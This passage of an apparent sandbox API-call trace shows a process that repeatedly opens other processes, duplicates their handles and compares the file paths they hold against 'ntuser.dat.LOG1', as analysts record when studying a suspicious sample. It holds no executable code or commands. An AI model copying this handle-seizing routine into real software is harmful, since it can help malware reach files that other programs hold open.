lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.820] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.821] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.821] CloseHandle (hObject=0x1e4) returned 1 [0161.821] _wcsicmp (_Str1="\\Windows Media Player", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.821] CloseHandle (hObject=0x194) returned 1 [0161.821] CloseHandle (hObject=0x1e8) returned 1 [0161.821] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8f0) returned 0x1e8 [0161.821] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.821] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.822] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.823] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.823] CloseHandle (hObject=0x1e4) returned 1 [0161.823] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.823] CloseHandle (hObject=0x194) returned 1 [0161.823] CloseHandle (hObject=0x1e8) returned 1 [0161.823] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8f0) returned 0x1e8 [0161.823] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.823] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.824] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.825] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.825] CloseHandle (hObject=0x1e4) returned 1 [0161.825] _wcsicmp (_Str1="\\Mozilla Firefox", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.825] CloseHandle (hObject=0x194) returned 1 [0161.825] CloseHandle (hObject=0x1e8) returned 1 [0161.825] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x900) returned 0x1e8 [0161.825] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.825] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.827] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.832] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.832] CloseHandle (hObject=0x1e4) returned 1 [0161.832] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.832] CloseHandle (hObject=0x194) returned 1 [0161.832] CloseHandle (hObject=0x1e8) returned 1 [0161.832] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x900) returned 0x1e8 [0161.832] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.832] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.833] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.834] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.834] CloseHandle (hObject=0x1e4) returned 1 [0161.834] _wcsicmp (_Str1="\\Windows Portable Devices", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.834] CloseHandle (hObject=0x194) returned 1 [0161.834] CloseHandle (hObject=0x1e8) returned 1 [0161.834] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x910) returned 0x1e8 [0161.834] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.834] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.835] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.836] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.836] CloseHandle (hObject=0x1e4) returned 1 [0161.836] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.836] CloseHandle (hObject=0x194) returned 1 [0161.836] CloseHandle (hObject=0x1e8) returned 1 [0161.836] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x910) returned 0x1e8 [0161.836] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.836] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.840] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.841] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.841] CloseHandle (hObject=0x1e4) returned 1 [0161.841] _wcsicmp (_Str1="\\Uninstall Information", _Str2="\\ntuser.dat.LOG1") returned 7 [0161.841] CloseHandle (hObject=0x194) returned 1 [0161.841] CloseHandle (hObject=0x1e8) returned 1 [0161.841] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x920) returned 0x1e8 [0161.842] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.842] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.843] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.844] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.844] CloseHandle (hObject=0x1e4) returned 1 [0161.844] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.844] CloseHandle (hObject=0x194) returned 1 [0161.844] CloseHandle (hObject=0x1e8) returned 1 [0161.844] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x920) returned 0x1e8 [0161.844] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.844] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.845] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.845] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.846] CloseHandle (hObject=0x1e4) returned 1 [0161.846] _wcsicmp (_Str1="\\Microsoft Office", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.846] CloseHandle (hObject=0x194) returned 1 [0161.846] CloseHandle (hObject=0x1e8) returned 1 [0161.846] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x930) returned 0x1e8 [0161.846] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.846] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.847] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.847] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.848] CloseHandle (hObject=0x1e4) returned 1 [0161.848] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.848] CloseHandle (hObject=0x194) returned 1 [0161.848] CloseHandle (hObject=0x1e8) returned 1 [0161.848] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x930) returned 0x1e8 [0161.848] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.848] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.849] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.849] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.849] CloseHandle (hObject=0x1e4) returned 1 [0161.849] _wcsicmp (_Str1="\\Microsoft Analysis Services", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.849] CloseHandle (hObject=0x194) returned 1 [0161.849] CloseHandle (hObject=0x1e8) returned 1 [0161.850] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x940) returned 0x1e8 [0161.850] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.850] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.850] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.851] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.851] CloseHandle (hObject=0x1e4) returned 1 [0161.851] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.851] CloseHandle (hObject=0x194) returned 1 [0161.851] CloseHandle (hObject=0x1e8) returned 1 [0161.851] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x940) returned 0x1e8 [0161.851] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.851] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.852] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.853] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.853] CloseHandle (hObject=0x1e4) returned 1 [0161.853] _wcsicmp (_Str1="\\Windows Sidebar", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.853] CloseHandle (hObject=0x194) returned 1 [0161.853] CloseHandle (hObject=0x1e8) returned 1 [0161.853] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x950) returned 0x1e8 [0161.853] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.853] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.854] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.855] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.855] CloseHandle (hObject=0x1e4) returned 1 [0161.855] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.855] CloseHandle (hObject=0x194) returned 1 [0161.855] CloseHandle (hObject=0x1e8) returned 1 [0161.855] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x950) returned 0x1e8 [0161.855] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.855] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.856] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.857] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.857] CloseHandle (hObject=0x1e4) returned 1 [0161.857] _wcsicmp (_Str1="\\Windows Journal", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.857] CloseHandle (hObject=0x194) returned 1 [0161.857] CloseHandle (hObject=0x1e8) returned 1 [0161.857] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x960) returned 0x1e8 [0161.857] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.857] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.858] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.859] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.859] CloseHandle (hObject=0x1e4) returned 1 [0161.859] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.859] CloseHandle (hObject=0x194) returned 1 [0161.859] CloseHandle (hObject=0x1e8) returned 1 [0161.859] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x960) returned 0x1e8 [0161.859] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.859] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.860] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.860] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.860] CloseHandle (hObject=0x1e4) returned 1 [0161.860] _wcsicmp (_Str1="\\Microsoft Analysis Services", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.860] CloseHandle (hObject=0x194) returned 1 [0161.860] CloseHandle (hObject=0x1e8) returned 1 [0161.861] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x970) returned 0x1e8 [0161.861] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.861] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.861] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.862] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.862] CloseHandle (hObject=0x1e4) returned 1 [0161.862] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.862] CloseHandle (hObject=0x194) returned 1 [0161.863] CloseHandle (hObject=0x1e8) returned 1 [0161.863] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x970) returned 0x1e8 [0161.863] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.863] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.863] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.864] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.864] CloseHandle (hObject=0x1e4) returned 1 [0161.864] _wcsicmp (_Str1="\\Microsoft Analysis Services", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.864] CloseHandle (hObject=0x194) returned 1 [0161.864] CloseHandle (hObject=0x1e8) returned 1 [0161.864] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x980) returned 0x1e8 [0161.864] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.864] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.865] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.865] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.866] CloseHandle (hObject=0x1e4) returned 1 [0161.866] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.866] CloseHandle (hObject=0x194) returned 1 [0161.866] CloseHandle (hObject=0x1e8) returned 1 [0161.866] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x980) returned 0x1e8 [0161.866] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.866] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.867] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.868] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.868] CloseHandle (hObject=0x1e4) returned 1 [0161.868] _wcsicmp (_Str1="\\Microsoft Synchronization Services", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.868] CloseHandle (hObject=0x194) returned 1 [0161.868] CloseHandle (hObject=0x1e8) returned 1 [0161.868] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x990) returned 0x1e8 [0161.868] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.868] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.869] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.869] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.869] CloseHandle (hObject=0x1e4) returned 1 [0161.870] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.870] CloseHandle (hObject=0x194) returned 1 [0161.870] CloseHandle (hObject=0x1e8) returned 1 [0161.870] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x990) returned 0x1e8 [0161.870] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.870] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.870] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.871] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.871] CloseHandle (hObject=0x1e4) returned 1 [0161.871] _wcsicmp (_Str1="\\Windows Sidebar", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.871] CloseHandle (hObject=0x194) returned 1 [0161.871] CloseHandle (hObject=0x1e8) returned 1 [0161.871] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9a0) returned 0x1e8 [0161.872] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.872] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.872] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.873] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.873] CloseHandle (hObject=0x1e4) returned 1 [0161.873] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.873] CloseHandle (hObject=0x194) returned 1 [0161.873] CloseHandle (hObject=0x1e8) returned 1 [0161.874] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9a0) returned 0x1e8 [0161.874] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.874] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.875] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.876] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.876] CloseHandle (hObject=0x1e4) returned 1 [0161.876] _wcsicmp (_Str1="\\Internet Explorer", _Str2="\\ntuser.dat.LOG1") returned -5 [0161.876] CloseHandle (hObject=0x194) returned 1 [0161.876] CloseHandle (hObject=0x1e8) returned 1 [0161.876] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9b0) returned 0x1e8 [0161.876] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.876] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.877] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.877] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.878] CloseHandle (hObject=0x1e4) returned 1 [0161.878] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.878] CloseHandle (hObject=0x194) returned 1 [0161.878] CloseHandle (hObject=0x1e8) returned 1 [0161.878] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9b0) returned 0x1e8 [0161.878] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.878] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.879] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.879] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.879] CloseHandle (hObject=0x1e4) returned 1 [0161.880] _wcsicmp (_Str1="\\Adobe", _Str2="\\ntuser.dat.LOG1") returned -13 [0161.880] CloseHandle (hObject=0x194) returned 1 [0161.880] CloseHandle (hObject=0x1e8) returned 1 [0161.880] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9c0) returned 0x1e8 [0161.880] DuplicateHandle (in: 